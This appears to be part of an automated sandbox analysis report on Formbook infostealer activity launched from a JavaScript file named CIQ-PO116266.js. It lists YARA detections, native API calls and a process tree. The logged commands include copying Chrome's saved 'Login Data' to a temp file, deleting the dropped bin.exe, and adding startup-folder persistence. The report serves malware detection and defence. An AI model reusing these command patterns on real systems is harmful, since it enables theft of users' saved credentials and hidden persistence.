Source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.281730307.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.297218621.00000249697DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.300820496.00000249697DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.281350445.0000024969781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000A.00000002.807957265.00000216DE0A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.296801406.0000024969781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.303697866.0000024969781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.280807014.0000024969781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: Process Memory Space: wscript.exe PID: 6816, type: MEMORYSTR Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A1030 2_2_013A1030
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BEA25 2_2_013BEA25
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A9280 2_2_013A9280
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A2D90 2_2_013A2D90
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013ADC20 2_2_013ADC20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A2FB0 2_2_013A2FB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD792 2_2_013BD792
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BE78A 2_2_013BE78A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331EBB0 18_2_0331EBB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03306E30 18_2_03306E30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E0D20 18_2_032E0D20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03304120 18_2_03304120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EF900 18_2_032EF900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B1D55 18_2_033B1D55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FD5E0 18_2_032FD5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F841F 18_2_032F841F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1002 18_2_033A1002
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FB090 18_2_032FB090
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00919280 18_2_00919280
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092EA25 18_2_0092EA25
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0091DC20 18_2_0091DC20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00912D90 18_2_00912D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D792 18_2_0092D792
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092E78A 18_2_0092E78A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00912FB0 18_2_00912FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 032EB150 appears 32 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA320 NtCreateFile, 2_2_013BA320
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA3D0 NtReadFile, 2_2_013BA3D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA500 NtAllocateVirtualMemory, 2_2_013BA500
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA450 NtClose, 2_2_013BA450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA31A NtCreateFile, 2_2_013BA31A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA3CA NtReadFile, 2_2_013BA3CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA4FA NtAllocateVirtualMemory, 2_2_013BA4FA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329710 NtQueryInformationToken,LdrInitializeThunk, 18_2_03329710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329B00 NtSetValueKey,LdrInitializeThunk, 18_2_03329B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329780 NtMapViewOfSection,LdrInitializeThunk, 18_2_03329780
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329FE0 NtCreateMutant,LdrInitializeThunk, 18_2_03329FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A50 NtCreateFile,LdrInitializeThunk, 18_2_03329A50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033296E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_033296E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033296D0 NtCreateKey,LdrInitializeThunk, 18_2_033296D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_03329910
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329540 NtReadFile,LdrInitializeThunk, 18_2_03329540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033299A0 NtCreateSection,LdrInitializeThunk, 18_2_033299A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033295D0 NtClose,LdrInitializeThunk, 18_2_033295D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_03329860
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329840 NtDelayExecution,LdrInitializeThunk, 18_2_03329840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329730 NtQueryVirtualMemory, 18_2_03329730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332A710 NtOpenProcessToken, 18_2_0332A710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329770 NtSetInformationFile, 18_2_03329770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332A770 NtOpenThread, 18_2_0332A770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329760 NtOpenProcess, 18_2_03329760
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332A3B0 NtGetContextThread, 18_2_0332A3B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033297A0 NtUnmapViewOfSection, 18_2_033297A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A20 NtResumeThread, 18_2_03329A20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329610 NtEnumerateValueKey, 18_2_03329610
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A10 NtQuerySection, 18_2_03329A10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A00 NtProtectVirtualMemory, 18_2_03329A00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329670 NtQueryInformationProcess, 18_2_03329670
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329660 NtAllocateVirtualMemory, 18_2_03329660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329650 NtQueryValueKey, 18_2_03329650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A80 NtOpenDirectoryObject, 18_2_03329A80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332AD30 NtSetContextThread, 18_2_0332AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329520 NtWaitForSingleObject, 18_2_03329520
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329560 NtWriteFile, 18_2_03329560
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329950 NtQueueApcThread, 18_2_03329950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033295F0 NtQueryInformationFile, 18_2_033295F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033299D0 NtCreateProcessEx, 18_2_033299D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329820 NtEnumerateKey, 18_2_03329820
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332B040 NtSuspendThread, 18_2_0332B040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033298A0 NtWriteVirtualMemory, 18_2_033298A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033298F0 NtReadVirtualMemory, 18_2_033298F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A3D0 NtReadFile, 18_2_0092A3D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A320 NtCreateFile, 18_2_0092A320
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A450 NtClose, 18_2_0092A450
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A3CA NtReadFile, 18_2_0092A3CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A31A NtCreateFile, 18_2_0092A31A
PE file does not import any functions
Source: bin.exe.0.dr Static PE information: No import functions for PE file found
Source: msdxp.exe.4.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: CIQ-PO116266.js Initial sample: Strings found which are bigger than 50
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\bin.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: bin.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: msdxp.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: bin.exe.0.dr Static PE information: Section .text
Source: msdxp.exe.4.dr Static PE information: Section .text
Source: CIQ-PO116266.js ReversingLabs: Detection: 14%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO116266.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORYNeBzyRj.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORYNeBzyRj.js" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\ORYNeBzyRj.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@18/5@33/18
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01
